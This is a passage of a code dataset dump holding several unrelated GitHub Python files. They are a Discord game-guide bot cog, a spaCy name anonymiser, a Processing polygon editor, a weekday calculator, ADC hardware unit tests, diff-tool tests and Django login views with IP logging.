description='', url=ACT6_SHEET)\r\n tiles = self.export[key]['tiles']\r\n if champion.full_name is not None:\r\n if power is not None:\r\n data.set_author(name='{} : {:,}'.format(champion.full_name, power))\r\n else:\r\n data.set_author(name='{}'.format(champion.full_name))\r\n if champion.get_avatar() is not None:\r\n data.set_thumbnail(url=champion.get_avatar())\r\n if tiles != '':\r\n data.description += '\\nTiles: {}\\n<:energy:557675957515845634> {:,}'.format(tiles, tiles*3)\r\n if hp != '':\r\n data.description += '\\n<:friendshp:344221218708389888> {:,}'.format(hp)\r\n else:\r\n data.description += '\\n<:friendshp:344221218708389888> ???'\r\n\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n data.description+='\\n\\n__Global__: __{}__\\n{}'.format(self.glossary_keys[g], self.glossary_desc[g])\r\n # data.add_field(name='Global Boost: {}'.format(g.title()),\r\n # value='{}'.format(self.glossary_desc[g]))\r\n # if self.glossary_tips[g] != \"\":\r\n # data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n for b in boosts:\r\n if b != '-' and b !='':\r\n data.description += '\\n\\n__{}__\\n{}'.format(self.glossary_keys[b], self.glossary_desc[b])\r\n # data.add_field(name='{}'.format(b.title()),\r\n # value='{}'.format(self.glossary_desc[b]))\r\n # if self.glossary_tips[b] != \"\":\r\n # data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[b])\r\n if notes != '':\r\n data.description+='\\n\\n__Notes__\\n{}'.format(notes)\r\n # data.add_field(name='Notes', value=notes)\r\n if map in starfire_maps:\r\n data.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {}'\r\n ''.format(author.display_name),\r\n icon_url=GSHEET_ICON)\r\n else:\r\n data.set_footer(\r\n text='CollectorDevTeam Data + StarFighter | Requested by {}'.format(\r\n author.display_name),\r\n icon_url=COLLECTOR_ICON)\r\n pages.append(data)\r\n i+=1\r\n if verbose:\r\n i = 1\r\n for page in pages:\r\n if map in starfire_maps:\r\n page.set_footer(\r\n text='Glossary by StarFighter + DragonFei + Royal | Requested by {} | Fight {} of {}'\r\n ''.format(author.display_name, i, len(pages)),\r\n icon_url=GSHEET_ICON)\r\n else:\r\n page.set_footer(\r\n text='CollectorDevTeam Data + StarFighter | Requested by {}'\r\n ''.format(\r\n author.display_name),\r\n icon_url=COLLECTOR_ICON)\r\n await self.bot.say(embed=page)\r\n i+=1\r\n else:\r\n menu = PagesMenu(self.bot, timeout=720, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(pages)\r\n return\r\n\r\n @commands.command(pass_context=True, name='rttl')\r\n async def rttl_paths(self, ctx, map=None, path=None, verbose=True):\r\n \"\"\"Road To The Labyrinth Guide\r\n\r\n \"\"\"\r\n author = ctx.message.author\r\n ucolor = discord.Color.gold()\r\n if ctx.message.channel.is_private is False:\r\n ucolor = author.color\r\n data = discord.Embed(color=ucolor, title='Story Quest Help', description='')\r\n\r\n # starfire_maps = ('6.1.1', '6.1.2', '6.1.3', '6.1.4', '6.1.5', '6.1.6')\r\n valid_maps = []\r\n for k in self.paths.keys():\r\n if k != '_headers' and k != 'emoji' and k != 'map' and k != 'rttl':\r\n valid_maps.append(k)\r\n valid_maps.sort()\r\n if map not in valid_maps and map is not None and path is None:\r\n if '.' 
in map:\r\n map, path = map.split('.')\r\n map = \"rttl_{}\".format(map)\r\n path = 'path{}'.format(path)\r\n elif \"rttl_{}\".format(map) in valid_maps:\r\n map = \"rttl_{}\".format(map)\r\n else:\r\n return\r\n else:\r\n data.description ='Please select a valid Road to the Labyrinth Chapter:\\n1, 2, 3, 4'\r\n await self.bot.say(embed=data)\r\n return\r\n\r\n print(map)\r\n print(path)\r\n all_paths = self.paths['_headers']['paths']\r\n all_paths = list(filter(lambda a: a != '', all_paths)) #remove \"\" from valid paths\r\n valid_paths = []\r\n for a in all_paths:\r\n if a in self.paths[map].keys() and self.paths[map][a] != \"\":\r\n valid_paths.append(a)\r\n\r\n if path not in valid_paths and path is not None:\r\n if \"path{}\".format(path) in valid_paths:\r\n path = \"path{}\".format(path)\r\n else:\r\n return\r\n elif path is None or path not in valid_paths:\r\n attrs = {}\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n if self.globals[map]['chapter_champ'] != '':\r\n boss = await ChampConverter.get_champion(self, self.bot, self.globals[map]['chapter_champ'], attrs)\r\n data.title = '{} | {}\\nQuest: {}'.\\\r\n format(self.globals[map]['act_title'],\r\n self.globals[map]['chapter_title'],\r\n self.globals[map]['quest_title'])\r\n data.set_thumbnail(url=boss.get_avatar())\r\n print(valid_paths)\r\n\r\n\r\n for p in valid_paths:\r\n if p is not None and p != \"\":\r\n key = '{}-{}-1'.format(map, p)\r\n for emoji in self.all_emojis.values():\r\n if emoji.path == p:\r\n data.add_field(name=emoji.text, value='Quest: {}\\nTiles: {}\\nEnergy: {}\\nNotes: {}'\r\n .format(p[-1:],self.export[key]['tiles'],\r\n self.export[key]['tiles']*3,\r\n self.export[key]['notes']))\r\n continue\r\n gboosts = self.export[key]['global'].split(', ')\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n data.add_field(name='Global Boost: {}'.format(g.title()),\r\n value='{}'.format(self.glossary_desc[g]))\r\n if self.glossary_tips[g] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n message = await self.bot.say(embed=data)\r\n self.included_emojis = set()\r\n for emoji in self.all_emojis.values():\r\n if emoji.path in valid_paths:\r\n try:\r\n print(emoji.emoji)\r\n await self.bot.add_reaction(message, emoji.emoji)\r\n except:\r\n raise KeyError('Unknwon Emoji : {}'.format(emoji.emoji))\r\n self.included_emojis.add(emoji.emoji)\r\n\r\n react = await self.bot.wait_for_reaction(message=message, user=ctx.message.author,\r\n timeout=30, emoji=self.included_emojis)\r\n if react is None:\r\n try:\r\n await self.bot.clear_reactions(message)\r\n except discord.errors.NotFound:\r\n # logger.warn(\"Message has been deleted\")\r\n print('Message deleted')\r\n except discord.Forbidden:\r\n # logger.warn(\"clear_reactions didn't work\")\r\n for emoji in self.included_emojis:\r\n await self.bot.remove_reaction(message, emoji, self.bot.user)\r\n return\r\n emoji = react.reaction.emoji\r\n path = self.all_emojis[emoji].path if emoji in self.all_emojis else None\r\n\r\n if path in valid_paths:\r\n tiles = self.paths[map][path]\r\n tiles = tiles.split(',')\r\n pages = []\r\n i = 1\r\n for tile in tiles:\r\n key = '{}-{}-{}'.format(map, path, tile)\r\n attrs = {}\r\n mob = self.export[key]['mob'].lower()\r\n attrs['star'] = 5\r\n attrs['rank'] = 5\r\n champion = await ChampConverter.get_champion(self, self.bot, mob, attrs)\r\n power = self.export[key]['power']\r\n hp = self.export[key]['hp']\r\n boosts = self.export[key]['boosts'].split(', ')\r\n gboosts = 
self.export[key]['global'].split(', ')\r\n notes = self.export[key]['notes']\r\n # attack = self.export[key]['attack']\r\n data = discord.Embed(color=CDT_COLORS[champion.klass], title='Road To The Labyrinth\\nChapter {} Quest {} | Fight {}'.format(map[-1:], path[-1:], i),\r\n description='', url=ACT6_SHEET)\r\n tiles = self.export[key]['tiles']\r\n if power != '':\r\n data.set_author(name='{} : {:,}'.format(champion.full_name, power))\r\n else:\r\n data.set_author(name='{}'.format(champion.full_name))\r\n data.set_thumbnail(url=champion.get_avatar())\r\n if tiles != '':\r\n data.description += '\\nTiles: {}\\n<:energy:557675957515845634> {:,}'.format(tiles, tiles*3)\r\n # if power != '':\r\n # data.description += '\\nPower {:,}'.format(power)\r\n if hp != '':\r\n data.description += '\\n<:friendshp:344221218708389888> {:,}'.format(hp)\r\n else:\r\n data.description += '\\n<:friendshp:344221218708389888> ???'\r\n # if attack != '':\r\n # data.description += '\\n<:xassassins:487357359241297950> {}'.format(attack)\r\n # else:\r\n # data.description += '\\n<:xassassins:487357359241297950> ???'\r\n for g in gboosts:\r\n if g != '-' and g != '':\r\n data.add_field(name='Global Boost: {}'.format(g.title()),\r\n value='{}'.format(self.glossary_desc[g]))\r\n if self.glossary_tips[g] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[g])\r\n\r\n for b in boosts:\r\n if b != '-' and b !='':\r\n data.add_field(name='{}'.format(b.title()),\r\n value='{}'.format(self.glossary_desc[b]))\r\n if self.glossary_tips[b] != \"\":\r\n data.add_field(name='CollectorVerse Tips', value=self.glossary_tips[b])\r\n if notes != '':\r\n data.add_field(name='Notes', value=notes)\r\n data.set_footer(\r\n text='CollectorDevTeam Data + StarFighter | Requested by {}'.format(\r\n author.display_name),\r\n icon_url=COLLECTOR_ICON)\r\n pages.append(data)\r\n i+=1\r\n if verbose:\r\n for page in pages:\r\n await self.bot.say(embed=page)\r\n else:\r\n menu = PagesMenu(self.bot, timeout=360, delete_onX=True, add_pageof=True)\r\n await menu.menu_start(pages)\r\n return\r\n\r\n\r\n\r\n\r\ndef check_folders():\r\n folders = ('data', 'data/storyquest/')\r\n for folder in folders:\r\n if not os.path.exists(folder):\r\n print(\"Creating \" + folder + \" folder...\")\r\n os.makedirs(folder)\r\n\r\n\r\ndef check_files():\r\n ignore_list = {'SERVERS': [], 'CHANNELS': []}\r\n\r\n files = {\r\n 'settings.json': {},\r\n 'cdt_glossary.json': {},\r\n 'cdt_paths.json': {},\r\n 'cdt_path_keys.json': {}\r\n }\r\n\r\n for filename, value in files.items():\r\n if not os.path.isfile('data/storyquest/{}'.format(filename)):\r\n print(\"Creating empty {}\".format(filename))\r\n dataIO.save_json('data/storyquest/{}'.format(filename), value)\r\n\r\ndef setup(bot):\r\n check_folders()\r\n check_files()\r\n sgd = StaticGameData()\r\n sgd.register_gsheets(bot)\r\n bot.add_cog(STORYQUEST(bot))\r\n","repo_name":"Trapavko/CollectorDevTeam-mcoc-v2","sub_path":"storyquest/storyquest.py","file_name":"storyquest.py","file_ext":"py","file_size_in_byte":30209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"74577613030","text":"import spacy\n\nnlp = spacy.load('en_core_web_sm')\n\ndef anonymize_text(sentences):\n answer = []\n dic = nlp(sentences, disable=['parser'])\n removed_chr = []\n\n for token in dic:\n # token = dic[i]\n print(token.text)\n\n if str(token.pos_) == \"PROPN\":\n \n if len(answer) > 1 and answer[-1] == \" \" and answer[-2][-1] == \"X\":\n answer[-1] = \"X\"\n\n if token.text not in removed_chr:\n answer.append(\"X\" * len(token.text))\n removed_chr.append(token.text)\n\n else:\n answer.append(token.text)\n \n if str(token.pos_) == \"PUNCT\" and len(answer) > 1 and answer[i-1] == ' ':\n answer.pop()\n \n else:\n answer.append(str(token.text))\n\n answer.append(\" \")\n print(answer)\n answer.pop()\n\n return \"\".join(answer)\n\ntext = 'Yuh-jung Youn won the Oscar for best supporting actress for her performance in \"Minari\" on Sunday and made history by becoming the first Korean actor to win an Academy Award.'\ntext1 = 'John is old'\ntext2 = 'Mark Oldham ate an apple'\ntext3 = 'John eats an...did something U.K.'\n# doc = nlp(text)\n\n# str_format = \"{:>10}\"*8\n# print(str_format.format('Text', 'Lemma', 'POS', 'Tag', 'Dep', 'Shape', 'is alpha', 'is stop'))\n# print(\"==\"*40)\n\n# for token in doc:\n# print(str_format.format(token.text, token.lemma_, token.pos_, token.tag_, \n# token.dep_, token.shape_, str(token.is_alpha), str(token.is_stop)))\n\n# print(anonymize_text(text))\n# print(anonymize_text(text1))\n# print(anonymize_text(text2))\nprint(anonymize_text(text3))\n\n","repo_name":"Valentino1994/dayAlgorithm","sub_path":"onedayAlgorithm/2022/Test/t2.py","file_name":"t2.py","file_ext":"py","file_size_in_byte":1672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34080268352","text":"# Alexandre B A Villares - https://abav.lugaralgum.com/sketch-a-day\n\"\"\"\nA minimal poly editor\n- Drag points from holes\n- Remove any point with CNTRL + click\n\"\"\"\n\nfrom polys import Poly\nPoly.cell_size = 25\nPoly.text_on = False\n\n# add_library('GifAnimation')\n# from gif_exporter import gif_export\n\n# f_pts = [map(lambda x: x / 5 - 12, pair) for pair in f_pts]\npolys = [Poly([(2, 2), (2, 4), (4, 4), (4, 2)]),\n Poly([(5, 5), (5, 7), (3, 3)]),\n Poly([(-8, -7), (-1, 0), (1, -9)],\n holes=[[(-4, -4), (-6, -6), (-1, -7)], ]),\n ]\n\ndef setup():\n global x_offset, y_offset, order\n size(500, 500, P2D)\n order = width / Poly.cell_size\n x_offset = y_offset = int(order / 2)\n strokeJoin(ROUND)\n f = createFont(\"Fira Mono Bold\", 16)\n textFont(f)\n\ndef draw():\n background(230)\n # grade\n Poly.grid(order)\n \n for p in polys:\n p.plot(x_offset, y_offset)\n\n\ndef mousePressed():\n for i in range(order):\n x = i * Poly.cell_size\n for j in range(order):\n y = j * Poly.cell_size\n io, jo = i - x_offset, j - y_offset # grid origin correction\n if dist(mouseX, mouseY, x, y) < Poly.cell_size / 2:\n if keyPressed and keyCode == CONTROL:\n for p in polys:\n if p.remove_pt(io, jo):\n break\n else:\n for ip, p in enumerate(polys):\n for ipt, pt in enumerate(p.outer_pts):\n if pt == (io, jo):\n Poly.drag = ip\n Poly.drag_pt = ipt\n break\n for ih, h in enumerate(p.holes):\n for ipt, pt in enumerate(h):\n if pt == (io, jo):\n Poly.drag = ip\n Poly.drag_hole = ih\n Poly.drag_pt = ipt\n break\n\ndef mouseDragged():\n if Poly.drag >= 0: # a Poly point has been selected to be dragged\n if Poly.drag_hole == -1: # if no hole wase selected\n polys[Poly.drag].outer_pts[Poly.drag_pt] = (\n int(mouseX / Poly.cell_size) - x_offset,\n int(mouseY / Poly.cell_size) - y_offset)\n else:\n polys[Poly.drag].holes[Poly.drag_hole][Poly.drag_pt] = (\n int(mouseX / Poly.cell_size) - x_offset,\n int(mouseY / Poly.cell_size) - y_offset)\n\ndef mouseReleased():\n Poly.drag = -1 # No poly selected\n Poly.drag_hole = -1 # No hole selected\n Poly.drag_pt = -1 # No point selected\n\ndef keyPressed():\n if key == \" \":\n for p in polys:\n p.outer_pts[:] = clockwise_sort(p.outer_pts)\n for h in p.holes:\n h[:] = clockwise_sort(h)[::-1]\n # if key == \"g\":\n # gif_export(GifMaker, filename=SKETCH_NAME)\n if key == \"s\":\n saveFrame(SKETCH_NAME+\"#.png\")\n if key == \"t\":\n Poly.text_on = not Poly.text_on\n\ndef clockwise_sort(xy_pairs):\n # https://stackoverflow.com/questions/51074984/sorting-according-to-clockwise-point-coordinates\n data_len = len(xy_pairs)\n if data_len > 2:\n x, y = zip(*xy_pairs)\n else:\n return xy_pairs\n centroid_x, centroid_y = sum(x) / data_len, sum(y) / data_len\n xy_sorted = sorted(xy_pairs,\n key=lambda p: atan2((p[1] - centroid_y), (p[0] - centroid_x)))\n xy_sorted_xy = [coord for pair in list(zip(*xy_sorted)) for coord in pair]\n half_len = int(len(xy_sorted_xy) / 2)\n return list(zip(xy_sorted_xy[:half_len], xy_sorted_xy[half_len:]))\n\n\ndef settings():\n from os import path\n global SKETCH_NAME\n SKETCH_NAME = path.basename(sketchPath())\n OUTPUT = \".png\"\n println(\n \"\"\"\n\n\n[{0}](https://github.com/villares/sketch-a-day/tree/master/2019/{0}) [[Py.Processing](https://villares.github.io/como-instalar-o-processing-modo-python/index-EN)]\n\"\"\".format(SKETCH_NAME, OUTPUT)\n 
)\n","repo_name":"villares/sketch-a-day","sub_path":"2019/sketch_190423a/sketch_190423a.pyde","file_name":"sketch_190423a.pyde","file_ext":"pyde","file_size_in_byte":4120,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"71"}
+{"seq_id":"13850548368","text":"\"\"\"\nFunctionality to calculate day of week.\n\"\"\"\nimport re\n\nDATE_REG_EXP = '^([0-9]{4}[-/]?((0[13-9]|1[012])[-/]?(0[1-9]|[12][0-9]|30)|(0[13578]|1[02])[-/]?31|02[-/]?(0[1-9]|1[0-9]|2[0-8]))|([0-9]{2}(([2468][048]|[02468][48])|[13579][26])|([13579][26]|[02468][048]|0[0-9]|1[0-6])00)[-/]?02[-/]?29)$'\nMONTH_CUM_SUM_DAYS = {\n 1: 0,\n 2: 31,\n 3: 59,\n 4: 90,\n 5: 120,\n 6: 151,\n 7: 181,\n 8: 212,\n 9: 243,\n 10: 273,\n 11: 304,\n 12: 334,\n}\nWEEKDAYS = {\n 0: 'Monday',\n 1: 'Tuesday',\n 2: 'Wednesday',\n 3: 'Thursday',\n 4: 'Friday',\n 5: 'Saturday',\n 6: 'Sunday',\n}\n\n\ndef calc_weekday(date_str):\n \"\"\"\n Calculate day of week based on provided date string.\n\n Arguments:\n date_str (str): provided date in \"YYYY-mm-dd\" format.\n\n Returns:\n week day name as a string.\n \"\"\"\n _validate(date_str=date_str)\n\n year = int(date_str[:4])\n month = int(date_str[5:7])\n day = int(date_str[8:])\n\n num_years_before = year - 1\n num_leap_years_days = calc_num_leap_years_before(year=year, month=month)\n current_year_days = MONTH_CUM_SUM_DAYS.get(month) + (day - 1)\n\n prev_days = num_years_before + + num_leap_years_days + current_year_days\n\n weekday = WEEKDAYS.get(prev_days % 7)\n\n return weekday\n\n\nclass InvalidArgumentError(Exception):\n \"\"\"\n Invalid argument error implementation.\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Construct the object.\n \"\"\"\n self.message = 'The provided arguments do not comply restrictions. Value should be in format \"YYYY-mm-dd\".'\n\n def __str__(self):\n \"\"\"\n Define string representation.\n\n Returns:\n Error message as a string\n \"\"\"\n return self.message\n\n\ndef _validate(date_str):\n \"\"\"\n Validate input date string.\n\n Arguments:\n date_str (str): provided date.\n\n Raises:\n InvalidArgumentError: when provided string is not a real date or do not comply format restrictions.\n \"\"\"\n if not re.match(DATE_REG_EXP, date_str):\n raise InvalidArgumentError()\n\n\ndef _is_leap_year(year):\n \"\"\"\n Check whether provided year is leap or not.\n\n Arguments:\n year (int): specified year.\n\n Returns:\n boolean identifier whether provided year is leap or not.\n \"\"\"\n if (year % 4) > 0:\n return False\n\n if (year % 100) > 0:\n return True\n\n if (year % 400) == 0:\n return True\n\n else:\n return False\n\n\ndef calc_num_leap_years_before(year, month):\n \"\"\"\n Calculate number of 29th February dates happened before specified date.\n\n Arguments:\n year (int): specified year.\n month (int): specified month.\n\n Returns:\n number of 29th February dates happened before specified date as an integer.\n \"\"\"\n num_leap_years = year // 4 - year // 100 + year // 400\n\n if _is_leap_year(year):\n if month < 3:\n num_leap_years = num_leap_years - 1 # 29th of February not happened on provided leap year.\n\n return num_leap_years\n","repo_name":"andritar/week-day","sub_path":"weekday/calc.py","file_name":"calc.py","file_ext":"py","file_size_in_byte":3034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"34241859253","text":"import sys\nimport unittest\nsys.path.append('source')\nfrom UnitTesting.shorthand import *\nfrom AD7766_postprocessing import *\nfrom DataAquisition import MCP3561\n\nclass TestArduinoADCSampling(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.device = MCP3561(sampling_frequency=9.76*1e3)\n\n def setUp(self):\n self.device.Reset() # ONLY WORKS ON PYSERIAL\n\n def testIdentify(self):\n \"\"\"\n Tests the Identify() function to check there are no more bytes than expected and to check that the ID\n does not change from initialization of the device\n \"\"\"\n deviceIDActual = self.device.Identify()\n deviceIDDesired = self.device.deviceID\n self.assertEqual(deviceIDDesired, deviceIDActual)\n self.assertEqual(self.device.inWaiting(), 0) # Verify that there ore no bytes left to be read\n\n def testMeasure(self):\n \"\"\"\n Asserts that the result of a measurement is a set of three bytes, and that no more than 3 bytes are returned\n \"\"\"\n desiredMeasurements = 1\n measuredData = self.device.Measure()\n self.assertEqual(len(measuredData), 3)\n self.assertEqual(self.device.inWaiting(), 0) # Verify that there ore no bytes left to be read\n\n\n def testMeasureByteCount(self):\n \"\"\"\n Asserts that the Configure() function can be used to measure between 1 and 100,000 measurements without\n dropping a single byte.\n \"\"\"\n desiredMeasurementsList = [1, 10, 100, 1000, 10000]\n\n for desiredMeasurements in desiredMeasurementsList:\n desiredBytes = desiredMeasurements * 3\n self.device.Configure(desiredMeasurements)\n data = self.device.Measure()\n actualBytes = len(data)\n self.assertEqual(actualBytes, desiredBytes,\n msg=f'Received wrong number of bytes. Actual bytes: {actualBytes}.' + \\\n f'Desired bytes: {desiredBytes}' + \\\n f'attempt restart of the arduino.\\n')\n\n @unittest.skip(\"Extremely large data transfer (long test)\")\n def testMeasureLargeByteCount(self):\n \"\"\"\n Asserts that we can measure very large numbers of measurements (1 million in this test) without dropping\n any bytes.\n \"\"\"\n desiredMeasurements = int(500000)\n desiredBytes = desiredMeasurements * 3\n self.device.Configure(desiredMeasurements)\n data = self.device.Measure() # If this isn't blocking, it should probably be made blocking.\n actualBytes = len(data)\n self.assertEqual(actualBytes, desiredBytes,\n msg=f'Received wrong number of bytes. Actual bytes: {actualBytes}.' + \\\n f'Desired bytes: {desiredBytes}' + \\\n f'attempt restart of the arduino.\\n')\n\n def testMeasureSynchronizationPoints(self):\n \"\"\"\n Confirm that we get the expected number of data synchronization events when we sample in a given time period.\n Assumes an external 1kHz square wave is being applied to pin 20 on the Teensy.\n \"\"\"\n fSync = 1000\n desiredSynchronizationEvents = 8\n numberMeasurements = int(self.device.measurementRate/fSync * desiredSynchronizationEvents)\n self.device.Configure(numberMeasurements)\n self.device.Measure()\n print(self.device.getSyncData())\n actualSynchronizationEvents = self.device.syncPoints\n self.assertEqual(actualSynchronizationEvents, desiredSynchronizationEvents, msg='Failed to synchronize to external function generator. Is it turned on?')\n\n def testMeasureSynchronizationData(self):\n \"\"\"\n Verify that the synchronization data we get is \"reasonable\" - that is that points are separated by very close\n to their expected frequency of 1kHz. 
This assumes there is a square wave at 1kHz sending data to the Teensy.\n \"\"\"\n fSync = 1000\n desiredSynchronizationEvents = 3\n numberMeasurements = int(self.device.measurementRate/fSync * desiredSynchronizationEvents)\n self.device.Configure(numberMeasurements)\n self.device.Measure()\n actualSynchronizationEvents = self.device.syncPoints\n syncData = self.device.getSyncData()\n bytesPerDataPoint = 3\n desiredSyncBytes = bytesPerDataPoint * desiredSynchronizationEvents\n\n # check that the data has the right number of bytes in it\n self.assertEqual(len(syncData), desiredSyncBytes)\n measurementPoints = twosToInteger(syncData)\n measurementDeltas = np.diff(measurementPoints)\n timeDeltas = 1 / self.device.measurementRate * measurementDeltas\n approxFrequencies = np.reciprocal(timeDeltas)\n assertAlmostEqual(approxFrequencies[0], fSync)\n assertAlmostEqual(approxFrequencies[1], fSync)\n\n @classmethod\n def tearDownClass(cls):\n cls.device.closeDevice()\n","repo_name":"edmundsj/AD7766_Python","sub_path":"test/test_scpi_communication.py","file_name":"test_scpi_communication.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"33075547972","text":"\"\"\"\nA confederação Nacional de natação prescisa de um programa que leia o ano de nascimento\nde um atleta e mostre sua categoria de acordo a sua idade: \n\"\"\"\nfrom datetime import datetime\n\nnome = input('Diga o nome do nadador que deseja saber qual categoria ele participa: ')\ndata_nasc = (input(f'Diga qual ano o {nome} nasceu: '))\nwhile not data_nasc.isdigit() or len(data_nasc) != 4 or int(data_nasc) > datetime.now().year:\n data_nasc = input(f'Diga qual ano o {nome} nasceu,\\n exemplo: 2004 \\n Diga: ')\n\ndata_atu = datetime.now()\ndata_ano = data_atu.year\nidade = int(data_ano) - int(data_nasc)\n#print(idade)\n\nif idade <= 9:\n print(f'{nome} está na categoria MIRIN.')\n \nelif idade > 9 and idade <= 14:\n print(f'{nome} está na categoria INFANTIL.')\n \nelif idade > 14 and idade <= 19:\n print(f'{nome} está na categoria JUNIOR.')\n \nelif idade == 20:\n print(f'{nome} está na categoria SÊNIOR.')\n \nelse:\n print(f'{nome} está na categoria MASTER.')","repo_name":"ReinaldoGalvao/PYTHON_CURSO_EM_VIDEO","sub_path":"desafio041.py","file_name":"desafio041.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"72712581030","text":"import codecs\nimport os.path\nimport pytest\n\nfrom debbindiff.comparators import compare_unknown\n\nTEST_TEXT_ASCII_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/text_ascii1')\nTEST_TEXT_ASCII_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/text_ascii2')\nTEST_TEXT_UNICODE_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/text_unicode1')\nTEST_TEXT_UNICODE_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/text_unicode2')\nTEST_BINARY_FILE1_PATH = os.path.join(os.path.dirname(__file__), '../data/binary1')\nTEST_BINARY_FILE2_PATH = os.path.join(os.path.dirname(__file__), '../data/binary2')\n\ndef test_same_binaries():\n difference = compare_unknown(TEST_BINARY_FILE1_PATH, TEST_BINARY_FILE1_PATH)\n assert difference is None\n\ndef test_text_ascii_files():\n difference = compare_unknown(TEST_TEXT_ASCII_FILE1_PATH, TEST_TEXT_ASCII_FILE2_PATH)\n expected_diff = open(os.path.join(os.path.dirname(__file__), '../data/text_ascii_expected_diff')).read()\n assert difference.unified_diff == expected_diff\n\ndef test_text_unicode_files():\n difference = compare_unknown(TEST_TEXT_UNICODE_FILE1_PATH, TEST_TEXT_UNICODE_FILE2_PATH)\n expected_diff = codecs.open(os.path.join(os.path.dirname(__file__), '../data/text_unicode_expected_diff'), encoding='utf-8').read()\n assert difference.unified_diff == expected_diff\n\ndef test_binary_files():\n difference = compare_unknown(TEST_BINARY_FILE1_PATH, TEST_BINARY_FILE2_PATH)\n expected_diff = codecs.open(os.path.join(os.path.dirname(__file__), '../data/binary_expected_diff')).read()\n assert difference.unified_diff == expected_diff\n","repo_name":"dezgeg/debbindiff","sub_path":"tests/comparators/test_generic.py","file_name":"test_generic.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"22363042608","text":"from django.shortcuts import redirect, render\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth import login\nfrom .forms import UserForm\n\nfrom django.http import HttpResponse\nfrom django.contrib.auth import authenticate\nfrom .forms import LoginForm\n\nfrom django.contrib.auth import logout\n\nimport logging\nlogger = logging.getLogger('django')\n\nimport hashlib\nimport time\nimport os\nfrom pathlib import Path\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nusername = ''\nip = ''\n\n# Create your views here.\n\ndef home(request):\n return render(request, 'home.html')\n\n\n\ndef signup(request):\n if request.method == 'POST':\n form = UserForm(request.POST)\n if form.is_valid():\n new_user = User.objects.create_user(**form.cleaned_data)\n login(request, new_user)\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n print('logger = ', logger, ' __name__ = ', __name__)\n logger.debug('[MODULE] = {} [IP] = {} [USER NAME] = {}'.format('SIGN UP', ip, new_user))\n\n #로그 정보 해시하기\n now = time.localtime()\n now = \"%04d/%02d/%02d %02d:%02d:%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)\n userinfo = '[TIME]'+ now + ' [IP]' + ip + ' [USER]' + username\n\n print(userinfo)\n userinfo_1 = hashlib.sha256(userinfo.encode())\n finalinfo = (userinfo_1.hexdigest())\n\n hash_txt = os.path.join(BASE_DIR, 'logs') + \"/hash\"\n text = open(hash_txt, 'a')\n data = (userinfo + '\\n'+ '[SHA256] = ' + finalinfo + '\\n')\n text.write(data)\n text.close()\n \n return redirect('home')\n \n else:\n form = UserForm()\n return render(request, 'user_new.html')\n\n\ndef signin(request):\n if request.method == 'POST':\n form = LoginForm(request.POST)\n global username, ip\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username = username, password = password)\n\n x_forwarded_for = request.META.get('HTTP_X_FORWARDED_FOR')\n if x_forwarded_for:\n ip = x_forwarded_for.split(',')[0]\n else:\n ip = request.META.get('REMOTE_ADDR')\n\n if user is not None:\n login(request, user)\n logger.debug('[MODULE] = {} [IP] = {} [USER NAME] = {}'.format('SIGN IN', ip, username))\n\n #로그정보 해시하기\n now = time.localtime()\n now = \"%04d/%02d/%02d %02d:%02d:%02d\" % (now.tm_year, now.tm_mon, now.tm_mday, now.tm_hour, now.tm_min, now.tm_sec)\n userinfo = '[TIME]'+ now + ' [IP]' + ip + ' [USER]' + username\n\n print(userinfo)\n userinfo_1 = hashlib.sha256(userinfo.encode())\n finalinfo = (userinfo_1.hexdigest())\n\n hash_txt = os.path.join(BASE_DIR, 'logs') + \"/hash.txt\"\n text = open(hash_txt, 'a')\n data = (userinfo + '\\n'+ '[SHA256] = ' + finalinfo + '\\n')\n text.write(data)\n text.close()\n\n return redirect('home')\n \n else:\n return HttpResponse('Login failed. 
Try again.')\n else:\n form = LoginForm()\n return render(request, 'user_login.html')\n\n\n\n\ndef signout(request):\n logout(request)\n global username, ip\n logger.debug('[MODULE] = {} [IP] = {} [USER NAME] = {}'.format('LOGOUT', ip, username))\n ip = ''\n username = ''\n return redirect('home')\n\n\n\ndef google(request):\n logger.debug('[MODULE] = {} '.format('GOOGLE'))\n return render(request, 'google.html')","repo_name":"yejinneer/2021_KHU_G","sub_path":"myproject/myApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
